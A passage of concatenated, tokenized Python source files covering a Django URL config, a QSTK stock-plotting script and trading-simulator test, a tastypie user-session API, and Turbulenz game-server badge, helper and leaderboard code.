<s> from django . conf . urls import include , patterns , url <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> ) </s>
<s> import matplotlib . pyplot as plt <EOL> from pylab import * <EOL> from qstkutil import DataAccess as da <EOL> from qstkutil import timeutil as tu <EOL> from qstkutil import timeseries as ts <EOL> symbols = list ( ) <EOL> symbols = list ( np . loadtxt ( '<STR_LIT>' , dtype = '<STR_LIT:str>' , delimiter = '<STR_LIT:U+002C>' , <EOL> comments = '<STR_LIT:#>' , skiprows = <NUM_LIT:0> ) ) <EOL> symbols . append ( "<STR_LIT>" ) <EOL> tsstart = tu . ymd2epoch ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tsend = tu . ymd2epoch ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> storename = "<STR_LIT>" <EOL> fieldname = "<STR_LIT>" <EOL> adjcloses = ts . getTSFromData ( storename , fieldname , symbols , tsstart , tsend ) <EOL> print "<STR_LIT>" <EOL> print symbols <EOL> print adjcloses . values <EOL> dates = [ ] <EOL> for ts in adjcloses . timestamps : <EOL> dates . append ( tu . epoch2date ( ts ) ) <EOL> normdat = adjcloses . values / adjcloses . values [ <NUM_LIT:0> , : ] <EOL> plt . clf ( ) <EOL> for i in range ( <NUM_LIT:0> , size ( normdat [ <NUM_LIT:0> , : ] ) ) : <EOL> plt . plot ( dates , normdat [ : , i ] ) <EOL> plt . legend ( symbols ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . draw ( ) <EOL> savefig ( "<STR_LIT>" , format = '<STR_LIT>' ) </s>
<s> '''<STR_LIT>''' <EOL> import datetime as dt <EOL> import unittest <EOL> import pandas as pand <EOL> import numpy as np <EOL> import qstksim <EOL> class Test ( unittest . TestCase ) : <EOL> df_close = None <EOL> df_alloc = None <EOL> i_open_result = None <EOL> def _generate_data ( self ) : <EOL> ldt_timestamps = [ ] <EOL> na_close = np . ones ( ( <NUM_LIT:16> , <NUM_LIT:3> ) ) <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , i + <NUM_LIT:1> , <NUM_LIT:9> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , i + <NUM_LIT:1> , <NUM_LIT:16> ) ) <EOL> for i in range ( <NUM_LIT:16> ) : <EOL> if i == <NUM_LIT:0> : <EOL> na_close [ i , : ] = <NUM_LIT:1> <EOL> else : <EOL> na_close [ i , <NUM_LIT:0> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:0> ] + <NUM_LIT:1> <EOL> na_close [ i , <NUM_LIT:1> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:1> ] - <NUM_LIT> <EOL> if ( i % <NUM_LIT:3> == <NUM_LIT:0> ) : <EOL> na_close [ i , <NUM_LIT:2> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:2> ] + <NUM_LIT> <EOL> else : <EOL> na_close [ i , <NUM_LIT:2> ] = na_close [ i - <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> self . df_close = pand . DataFrame ( index = ldt_timestamps , data = na_close , columns = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] ) <EOL> na_alloc = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0> ] , [ <NUM_LIT:1.0> , - <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1.0> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1.0> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.5> ] ] ) <EOL> ldt_timestamps = [ dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT> ) ] <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> ldt_timestamps . append ( dt . 
datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:20> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:20> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT> ) ) <EOL> ldt_timestamps . append ( dt . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:4> ) ) <EOL> self . df_alloc = pand . DataFrame ( index = ldt_timestamps , data = na_alloc , columns = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] ) <EOL> self . df_alloc [ '<STR_LIT>' ] = <NUM_LIT:0.0> <EOL> self . i_open_result = <NUM_LIT> <EOL> def setUp ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . _generate_data ( ) <EOL> def test_buy_close ( self ) : <EOL> '''<STR_LIT>''' <EOL> ( df_funds , ts_leverage , f_commision , f_slippage , f_borrow ) = qstksim . tradesim ( self . df_alloc , self . df_close , <NUM_LIT> , <NUM_LIT:1> , True , <NUM_LIT> , <EOL> <NUM_LIT:5> , <NUM_LIT> ) <EOL> print '<STR_LIT>' + str ( f_commision ) <EOL> print '<STR_LIT>' + str ( f_slippage ) <EOL> print '<STR_LIT>' + str ( f_borrow ) <EOL> print '<STR_LIT>' <EOL> print ts_leverage <EOL> np . testing . assert_approx_equal ( df_funds [ - <NUM_LIT:1> ] , <NUM_LIT> * self . i_open_result , significant = <NUM_LIT:3> ) <EOL> self . assertTrue ( True ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . conf import settings <EOL> from django . contrib . auth import login <EOL> from django . contrib . auth import logout <EOL> from django . contrib . auth import authenticate <EOL> from django . contrib . auth . models import User <EOL> from tastypie import fields <EOL> from tastypie . exceptions import NotFound <EOL> from tastypie . exceptions import BadRequest <EOL> from tastypie . resources import Resource <EOL> from tastypie . resources import ModelResource <EOL> from tastypie . bundle import Bundle <EOL> from tastypie . authorization import Authorization <EOL> tur_settings = getattr ( settings , "<STR_LIT>" , { } ) <EOL> class UserSession ( object ) : <EOL> @ classmethod <EOL> def session_get_key ( cls , request , create_if_needed = True ) : <EOL> if not request . session . session_key and create_if_needed : <EOL> request . session . create ( ) <EOL> return request . session . session_key <EOL> @ classmethod <EOL> def object_for_request ( cls , request ) : <EOL> s = cls ( ) <EOL> s . id = cls . session_get_key ( request ) <EOL> s . expire_date = request . session . get_expiry_date ( ) <EOL> s . user = None <EOL> if request . user . is_authenticated ( ) : <EOL> s . user = request . user <EOL> return s <EOL> class UserResource ( ModelResource ) : <EOL> class Meta : <EOL> queryset = User . objects . all ( ) <EOL> resource_name = "<STR_LIT:user>" <EOL> authorization = Authorization ( ) <EOL> excludes = ( <EOL> "<STR_LIT:password>" , <EOL> ) , <EOL> class UserSessionResource ( Resource ) : <EOL> id = fields . CharField ( attribute = "<STR_LIT:id>" , readonly = True ) <EOL> expire_date = fields . DateTimeField ( attribute = "<STR_LIT>" , readonly = True ) <EOL> if "<STR_LIT>" in tur_settings : <EOL> user = fields . ForeignKey ( tur_settings [ "<STR_LIT>" ] , attribute = "<STR_LIT:user>" , readonly = True , null = True ) <EOL> else : <EOL> user = fields . 
ForeignKey ( UserResource , attribute = "<STR_LIT:user>" , readonly = True , null = True ) <EOL> class Meta : <EOL> resource_name = "<STR_LIT>" <EOL> object_class = UserSession <EOL> authorization = Authorization ( ) <EOL> def get_resource_uri ( self , bundle_or_obj = None , url_name = "<STR_LIT>" ) : <EOL> if not bundle_or_obj : <EOL> return super ( UserSessionResource , self ) . get_resource_uri ( bundle_or_obj , url_name ) <EOL> obj = bundle_or_obj <EOL> if isinstance ( obj , Bundle ) : <EOL> obj = obj . obj <EOL> kwargs = { <EOL> "<STR_LIT>" : self . _meta . resource_name , <EOL> "<STR_LIT>" : obj . id <EOL> } <EOL> if self . _meta . api_name : <EOL> kwargs [ "<STR_LIT>" ] = self . _meta . api_name <EOL> url = self . _build_reverse_url ( "<STR_LIT>" , kwargs = kwargs ) <EOL> return url <EOL> def _build_reverse_url ( self , name , args = None , kwargs = None ) : <EOL> ret = reverse ( name , args = args , kwargs = kwargs ) <EOL> return ret <EOL> def get_object_list ( self , request ) : <EOL> l = [ ] <EOL> try : <EOL> obj = self . _build_session_object_or_raise ( request ) <EOL> l . append ( obj ) <EOL> except NotFound : <EOL> pass <EOL> return l <EOL> def obj_get_list ( self , request = None , ** kwargs ) : <EOL> return self . get_object_list ( request ) <EOL> def obj_get ( self , request = None , ** kwargs ) : <EOL> return self . _build_session_object_or_raise ( request , kwargs [ "<STR_LIT>" ] ) <EOL> def obj_create ( self , bundle , request = None , ** kwargs ) : <EOL> user = self . find_or_create_user_for_new_session ( bundle , request , ** kwargs ) <EOL> if not user : <EOL> raise NotFound ( "<STR_LIT>" ) <EOL> login ( request , user ) <EOL> bundle . obj = self . _build_session_object ( request ) <EOL> bundle = self . full_hydrate ( bundle ) <EOL> return bundle <EOL> def obj_update ( self , bundle , request = None , ** kwargs ) : <EOL> bundle . obj = self . _build_session_object_or_raise ( request , kwargs [ "<STR_LIT>" ] ) <EOL> bundle = self . 
full_hydrate ( bundle ) <EOL> request . session . modified = True <EOL> return bundle <EOL> def obj_delete_list ( self , request = None , ** kwargs ) : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> def obj_delete ( self , request = None , ** kwargs ) : <EOL> self . _build_session_object_or_raise ( request , pk = kwargs [ "<STR_LIT>" ] ) <EOL> logout ( request ) <EOL> def rollback ( self , bundles ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def find_or_create_user_for_new_session ( self , bundle , request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _build_session_object ( self , request ) : <EOL> return self . _meta . object_class . object_for_request ( request ) <EOL> def _build_session_object_or_raise ( self , request , pk = None ) : <EOL> key = self . _meta . object_class . session_get_key ( request , create_if_needed = False ) <EOL> if not key : <EOL> raise NotFound ( "<STR_LIT>" ) <EOL> if pk and pk != key : <EOL> raise NotFound ( "<STR_LIT>" ) <EOL> return self . _build_session_object ( request ) <EOL> class FacebookAuthUserSessionResource ( UserSessionResource ) : <EOL> """<STR_LIT>""" <EOL> def find_or_create_user_for_new_session ( self , bundle , request , ** kwargs ) : <EOL> return authenticate ( <EOL> fb_use_cookie = bool ( bundle . data . get ( "<STR_LIT>" , False ) ) , <EOL> fb_code = bundle . data . get ( "<STR_LIT>" , None ) , <EOL> fb_token = bundle . data . get ( "<STR_LIT>" , None ) , <EOL> request = request , <EOL> register_new_users = True <EOL> ) <EOL> class DjangoAuthUserSessionResource ( UserSessionResource ) : <EOL> """<STR_LIT>""" <EOL> def find_or_create_user_for_new_session ( self , bundle , request , ** kwargs ) : <EOL> return authenticate ( ** bundle . data ) </s>
<s> from logging import getLogger <EOL> from yaml . scanner import ScannerError <EOL> from pylons import response <EOL> from turbulenz_local . lib . servicestatus import ServiceStatus <EOL> from turbulenz_local . decorators import jsonify , secure_post <EOL> from turbulenz_local . controllers import BaseController <EOL> from turbulenz_local . models . gamelist import get_game_by_slug <EOL> from turbulenz_local . models . apiv1 . badges import Badges , BadgesUnsupportedException <EOL> from turbulenz_local . models . userlist import get_current_user <EOL> from turbulenz_local . lib . exceptions import ApiException <EOL> LOG = getLogger ( __name__ ) <EOL> class BadgesController ( BaseController ) : <EOL> """<STR_LIT>""" <EOL> badges_service = ServiceStatus . check_status_decorator ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> @ jsonify <EOL> def badges_user_list ( cls , slug = None ) : <EOL> try : <EOL> game = get_game_by_slug ( slug ) <EOL> if game is None : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> user = get_current_user ( ) <EOL> badges_obj = Badges . get_singleton ( game ) <EOL> badges = badges_obj . badges <EOL> badges_total_dict = dict ( ( b [ '<STR_LIT:key>' ] , b . get ( '<STR_LIT>' ) ) for b in badges ) <EOL> userbadges = badges_obj . find_userbadges_by_user ( user . username ) <EOL> for key , userbadge in userbadges . iteritems ( ) : <EOL> del userbadge [ '<STR_LIT:username>' ] <EOL> try : <EOL> total = badges_total_dict [ key ] <EOL> except KeyError : <EOL> continue <EOL> userbadge [ '<STR_LIT>' ] = total <EOL> userbadge [ '<STR_LIT>' ] = ( userbadge [ '<STR_LIT>' ] >= total ) <EOL> response . status_int = <NUM_LIT:200> <EOL> return { '<STR_LIT>' : True , '<STR_LIT:data>' : userbadges . values ( ) } <EOL> except BadgesUnsupportedException : <EOL> return { '<STR_LIT>' : False , '<STR_LIT:data>' : [ ] } <EOL> except ApiException as message : <EOL> response . 
status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : str ( message ) } <EOL> @ classmethod <EOL> @ badges_service <EOL> @ jsonify <EOL> def badges_list ( cls , slug ) : <EOL> try : <EOL> game = get_game_by_slug ( slug ) <EOL> if game is None : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> badges = Badges . get_singleton ( game ) . badges <EOL> for badge in badges : <EOL> if '<STR_LIT>' not in badge : <EOL> badge [ '<STR_LIT>' ] = None <EOL> if '<STR_LIT>' not in badge : <EOL> badge [ '<STR_LIT>' ] = None <EOL> return { '<STR_LIT>' : True , '<STR_LIT:data>' : badges } <EOL> except BadgesUnsupportedException : <EOL> return { '<STR_LIT>' : False , '<STR_LIT:data>' : [ ] } <EOL> except ApiException as message : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : str ( message ) } <EOL> except ScannerError as message : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' % ( message ) } <EOL> @ classmethod <EOL> @ badges_service <EOL> @ secure_post <EOL> def badges_user_add ( cls , slug , params = None ) : <EOL> try : <EOL> session = cls . _get_gamesession ( params ) <EOL> game = session . game <EOL> if game is None : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> badge_key = params [ '<STR_LIT>' ] <EOL> if not badge_key : <EOL> raise ApiException ( '<STR_LIT>' ) <EOL> badges_obj = Badges . get_singleton ( game ) <EOL> badge = badges_obj . get_badge ( badge_key ) <EOL> if not badge : <EOL> raise ApiException ( '<STR_LIT>' % badge_key ) <EOL> if not ( '<STR_LIT:image>' in badge ) or not badge [ '<STR_LIT:image>' ] : <EOL> badge [ '<STR_LIT:image>' ] = '<STR_LIT>' <EOL> ub = { '<STR_LIT:username>' : session . user . username , <EOL> '<STR_LIT>' : badge [ '<STR_LIT:key>' ] } <EOL> badge_total = badge . 
get ( '<STR_LIT>' ) <EOL> total = badge_total or <NUM_LIT:1.0> <EOL> current = <NUM_LIT:0> <EOL> if '<STR_LIT>' in params : <EOL> try : <EOL> current = float ( int ( params [ '<STR_LIT>' ] ) ) <EOL> except ( ValueError , TypeError ) : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> if not current : <EOL> current = total <EOL> ub [ '<STR_LIT>' ] = current <EOL> userbadge = badges_obj . get_userbadge ( session . user . username , badge_key ) <EOL> Badges . get_singleton ( game ) . upsert_badge ( ub ) <EOL> if current >= total and ( not userbadge or userbadge . get ( '<STR_LIT>' , <NUM_LIT:0> ) < total ) : <EOL> achieved = True <EOL> else : <EOL> achieved = False <EOL> response . status_int = <NUM_LIT:200> <EOL> return { '<STR_LIT>' : True , '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : current , <EOL> '<STR_LIT>' : badge_total , <EOL> '<STR_LIT>' : badge_key , <EOL> '<STR_LIT>' : achieved <EOL> } } <EOL> except BadgesUnsupportedException : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> except ApiException as message : <EOL> response . status_int = <NUM_LIT> <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : str ( message ) } </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import urllib2 <EOL> from hashlib import md5 <EOL> from urllib import urlencode <EOL> from os . path import join as path_join <EOL> from platform import system as platform_system <EOL> import simplejson as json <EOL> from yaml import load as yaml_load <EOL> from paste . deploy . converters import asbool , asint <EOL> from pylons import request <EOL> from turbulenz_local import SDK_VERSION , CONFIG_PATH <EOL> from turbulenz_local . models . gamelist import get_game_by_slug <EOL> from turbulenz_local . tools import slugify as slugify_fn <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def turbulenz_api ( endpoint , timeout = <NUM_LIT:5> ) : <EOL> try : <EOL> f = urllib2 . urlopen ( endpoint , None , timeout ) <EOL> try : <EOL> data = json . load ( f ) <EOL> finally : <EOL> f . close ( ) <EOL> except urllib2 . URLError as e : <EOL> LOG . error ( '<STR_LIT>' , endpoint ) <EOL> LOG . error ( '<STR_LIT>' , str ( e ) ) <EOL> data = { } <EOL> return data <EOL> def turbulenz_sdk_version ( sdk_version ) : <EOL> query = turbulenz_api ( sdk_version ) <EOL> if query . get ( '<STR_LIT>' , False ) : <EOL> data = query . 
get ( '<STR_LIT:data>' , None ) <EOL> if data : <EOL> os_mapping = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> sysname = platform_system ( ) <EOL> os = os_mapping [ sysname ] <EOL> this_os = data [ os ] <EOL> latest_version = this_os [ '<STR_LIT>' ] <EOL> all_versions = this_os [ '<STR_LIT>' ] <EOL> if all_versions : <EOL> latest_link = '<STR_LIT>' % all_versions [ latest_version ] [ '<STR_LIT:file>' ] <EOL> else : <EOL> latest_link = '<STR_LIT>' <EOL> latest_version = '<STR_LIT>' <EOL> return { <EOL> '<STR_LIT>' : latest_version , <EOL> '<STR_LIT>' : SDK_VERSION , <EOL> '<STR_LIT>' : latest_link <EOL> } <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : SDK_VERSION , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def turbulenz_engine_version ( engine_version ) : <EOL> query = turbulenz_api ( engine_version ) <EOL> plugin_data = { } <EOL> if query . get ( '<STR_LIT>' , False ) : <EOL> data = query . get ( '<STR_LIT:data>' , None ) <EOL> if data : <EOL> os_list = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for o in os_list : <EOL> this_os = data [ o ] <EOL> latest_plugin_version = this_os [ '<STR_LIT>' ] <EOL> all_versions = this_os [ '<STR_LIT>' ] <EOL> if all_versions : <EOL> latest_plugin_link = all_versions [ latest_plugin_version ] [ '<STR_LIT:file>' ] <EOL> else : <EOL> latest_plugin_link = '<STR_LIT>' <EOL> latest_plugin_version = '<STR_LIT>' <EOL> os_data = { <EOL> '<STR_LIT>' : latest_plugin_version , <EOL> '<STR_LIT>' : latest_plugin_link <EOL> } <EOL> plugin_data [ o ] = os_data <EOL> return plugin_data <EOL> def _load_yaml_mapping ( filename ) : <EOL> try : <EOL> f = open ( filename ) <EOL> try : <EOL> yaml_versions = yaml_load ( f ) <EOL> finally : <EOL> f . close ( ) <EOL> except IOError : <EOL> yaml_versions = { } <EOL> return yaml_versions <EOL> class Helpers ( object ) : <EOL> def __init__ ( self , config ) : <EOL> self . 
sdk_data = turbulenz_sdk_version ( config [ '<STR_LIT>' ] ) <EOL> self . plugin_data = turbulenz_engine_version ( config [ '<STR_LIT>' ] ) <EOL> self . gravatars_style = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if asbool ( config . get ( '<STR_LIT>' , False ) ) : <EOL> self . js_mapping = { } <EOL> self . css_mapping = { } <EOL> self . html_mapping = { } <EOL> else : <EOL> self . js_mapping = _load_yaml_mapping ( path_join ( CONFIG_PATH , '<STR_LIT>' ) ) <EOL> self . css_mapping = _load_yaml_mapping ( path_join ( CONFIG_PATH , '<STR_LIT>' ) ) <EOL> self . html_mapping = _load_yaml_mapping ( path_join ( CONFIG_PATH , '<STR_LIT>' ) ) <EOL> self . deploy_enable = asbool ( config . get ( '<STR_LIT>' , False ) ) <EOL> self . deploy_host = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . deploy_port = asint ( config . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . viewer_app = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def javascript_link ( self , url ) : <EOL> url = self . js_mapping . get ( url , url ) <EOL> return '<STR_LIT>' % url <EOL> def javascript_url ( self , url ) : <EOL> return self . js_mapping . get ( url , url ) <EOL> def stylesheet_link ( self , url ) : <EOL> url = self . css_mapping . get ( url , url ) <EOL> return '<STR_LIT>' % url <EOL> def stylesheet_url ( self , url ) : <EOL> return self . css_mapping . get ( url , url ) <EOL> def html_url ( self , url ) : <EOL> return self . html_mapping . get ( url , url ) <EOL> def gravatar_url ( self , name , style = None , size = <NUM_LIT:100> ) : <EOL> if not style : <EOL> style = self . gravatars_style <EOL> return '<STR_LIT>' % ( md5 ( name ) . hexdigest ( ) , <EOL> urlencode ( { '<STR_LIT:d>' : style , '<STR_LIT:s>' : str ( size ) } ) ) <EOL> @ classmethod <EOL> def search_order ( cls , match , default = False ) : <EOL> value = request . params . 
get ( '<STR_LIT>' ) <EOL> if value == match : <EOL> return '<STR_LIT>' <EOL> if not value and default : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def search_keywords ( cls ) : <EOL> return request . params . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def sdk_info ( self ) : <EOL> return json . JSONEncoder ( ) . encode ( self . sdk_data ) <EOL> def plugin_info ( self ) : <EOL> return json . JSONEncoder ( ) . encode ( self . plugin_data ) <EOL> def viewer_enabled ( self ) : <EOL> game = get_game_by_slug ( self . viewer_app ) <EOL> return '<STR_LIT:true>' if game else '<STR_LIT:false>' <EOL> @ classmethod <EOL> def sort_order ( cls , order ) : <EOL> classes = [ ] <EOL> if order is not None and order == request . params . get ( '<STR_LIT>' , None ) : <EOL> classes . append ( '<STR_LIT>' ) <EOL> if request . params . get ( '<STR_LIT>' , False ) : <EOL> classes . append ( '<STR_LIT>' ) <EOL> if classes : <EOL> return '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( classes ) <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def slugify ( cls , s ) : <EOL> return slugify_fn ( s ) <EOL> def make_helpers ( config ) : <EOL> return Helpers ( config ) </s>
<s> import logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> from re import compile as regex_compile <EOL> from time import time as time_now <EOL> from os . path import exists as path_exists , join as join_path , splitext <EOL> from math import floor , ceil , isinf , isnan <EOL> from threading import Lock <EOL> from pylons import config <EOL> import yaml <EOL> from turbulenz_local . tools import get_absolute_path , create_dir <EOL> from turbulenz_local . lib . validation import ValidationException <EOL> from turbulenz_local . models . userlist import get_user <EOL> REQUIRED_LEADERBOARD_KEYS = [ '<STR_LIT:key>' , '<STR_LIT:title>' ] <EOL> class LeaderboardError ( Exception ) : <EOL> def __init__ ( self , value , response_code = <NUM_LIT> ) : <EOL> super ( LeaderboardError , self ) . __init__ ( ) <EOL> self . value = value <EOL> self . response_code = response_code <EOL> def __str__ ( self ) : <EOL> return self . value <EOL> class LeaderboardsUnsupported ( LeaderboardError ) : <EOL> def __init__ ( self ) : <EOL> super ( LeaderboardsUnsupported , self ) . __init__ ( '<STR_LIT>' , <NUM_LIT> ) <EOL> class UserScore ( object ) : <EOL> def __init__ ( self , username , score , score_time ) : <EOL> self . user = username <EOL> self . score = score <EOL> self . score_time = score_time <EOL> def copy ( self ) : <EOL> return UserScore ( self . user , self . score , self . score_time ) <EOL> def to_dict ( self ) : <EOL> return { '<STR_LIT:user>' : self . user , <EOL> '<STR_LIT>' : self . score , <EOL> '<STR_LIT:time>' : self . score_time } <EOL> class Leaderboard ( object ) : <EOL> validate_key = regex_compile ( '<STR_LIT>' ) <EOL> def __init__ ( self , game , key , meta_data , index ) : <EOL> self . user_scores = { } <EOL> self . scores = [ ] <EOL> self . aggregate = False <EOL> self . aggregate_score = <NUM_LIT:0> <EOL> self . lock = Lock ( ) <EOL> self . errors = [ ] <EOL> self . warnings = [ ] <EOL> self . path = None <EOL> def error ( msg ) : <EOL> self . errors . 
append ( msg ) <EOL> def warning ( msg ) : <EOL> self . warnings . append ( msg ) <EOL> if not self . validate_key . match ( key ) : <EOL> error ( '<STR_LIT>' % key ) <EOL> self . key = key <EOL> self . index = index <EOL> if '<STR_LIT:title>' not in meta_data or meta_data [ '<STR_LIT:title>' ] is None : <EOL> error ( '<STR_LIT>' % key ) <EOL> self . title = '<STR_LIT>' <EOL> else : <EOL> self . title = meta_data [ '<STR_LIT:title>' ] <EOL> if '<STR_LIT>' in meta_data : <EOL> if isinstance ( meta_data [ '<STR_LIT>' ] , bool ) : <EOL> self . aggregate = meta_data [ '<STR_LIT>' ] <EOL> else : <EOL> warning ( '<STR_LIT>' % key ) <EOL> self . aggregate = False <EOL> else : <EOL> self . aggregate = False <EOL> try : <EOL> sort_by = int ( meta_data [ '<STR_LIT>' ] ) <EOL> if sort_by != - <NUM_LIT:1> and sort_by != <NUM_LIT:1> : <EOL> error ( '<STR_LIT>' % key ) <EOL> except KeyError : <EOL> warning ( '<STR_LIT>' % key ) <EOL> sort_by = <NUM_LIT:1> <EOL> except ValueError : <EOL> error ( '<STR_LIT>' % key ) <EOL> sort_by = <NUM_LIT:1> <EOL> self . sort_by = sort_by <EOL> if '<STR_LIT>' in meta_data : <EOL> warning ( '<STR_LIT>' <EOL> '<STR_LIT>' % key ) <EOL> try : <EOL> icon_path = meta_data [ '<STR_LIT>' ] <EOL> if path_exists ( get_absolute_path ( join_path ( game . path , icon_path ) ) ) : <EOL> if splitext ( icon_path ) [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> warning ( '<STR_LIT>' % key ) <EOL> else : <EOL> error ( '<STR_LIT>' % key ) <EOL> except KeyError : <EOL> warning ( '<STR_LIT>' % key ) <EOL> self . game = game <EOL> self . default_scores = [ ] <EOL> default_scores = meta_data . get ( '<STR_LIT>' , [ ] ) <EOL> for ( i , s ) in enumerate ( default_scores ) : <EOL> if not isinstance ( s , dict ) : <EOL> warning ( '<STR_LIT>' % key ) <EOL> continue <EOL> user = s . get ( '<STR_LIT:user>' , None ) <EOL> if user is None : <EOL> email = s . 
get ( '<STR_LIT:email>' , None ) <EOL> if email is None : <EOL> warning ( '<STR_LIT>' % key ) <EOL> continue <EOL> try : <EOL> user = email . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if user . startswith ( '<STR_LIT>' ) : <EOL> user = user [ <NUM_LIT:9> : ] <EOL> except AttributeError : <EOL> warning ( '<STR_LIT>' % ( email , key ) ) <EOL> continue <EOL> if '<STR_LIT>' in s : <EOL> try : <EOL> score = float ( s [ '<STR_LIT>' ] ) <EOL> if isinf ( score ) or isnan ( score ) : <EOL> warning ( '<STR_LIT>' % ( user , key ) ) <EOL> continue <EOL> user_score = UserScore ( user , score , time_now ( ) - i ) <EOL> self . default_scores . append ( user_score ) <EOL> except ( ValueError , TypeError ) : <EOL> warning ( '<STR_LIT>' % ( user , key ) ) <EOL> continue <EOL> else : <EOL> warning ( '<STR_LIT>' % ( user , key ) ) <EOL> continue <EOL> def to_dict ( self ) : <EOL> return { '<STR_LIT:key>' : self . key , <EOL> '<STR_LIT:index>' : self . index , <EOL> '<STR_LIT:title>' : self . title , <EOL> '<STR_LIT>' : self . sort_by } <EOL> def _set_path ( self ) : <EOL> if not self . path : <EOL> try : <EOL> path = config [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> path = join_path ( path , self . game . slug ) <EOL> if not create_dir ( path ) : <EOL> LOG . error ( '<STR_LIT>' , path ) <EOL> self . path = join_path ( path , self . key + '<STR_LIT>' ) <EOL> def _add_score ( self , user_score ) : <EOL> self . user_scores [ user_score . user ] = user_score <EOL> self . scores . append ( user_score ) <EOL> if self . aggregate : <EOL> self . aggregate_score += user_score . score <EOL> def _read_leaderboard ( self ) : <EOL> self . _set_path ( ) <EOL> with self . lock : <EOL> self . user_scores = { } <EOL> self . scores = [ ] <EOL> self . aggregate_score = <NUM_LIT:0> <EOL> unicode_path = unicode ( self . 
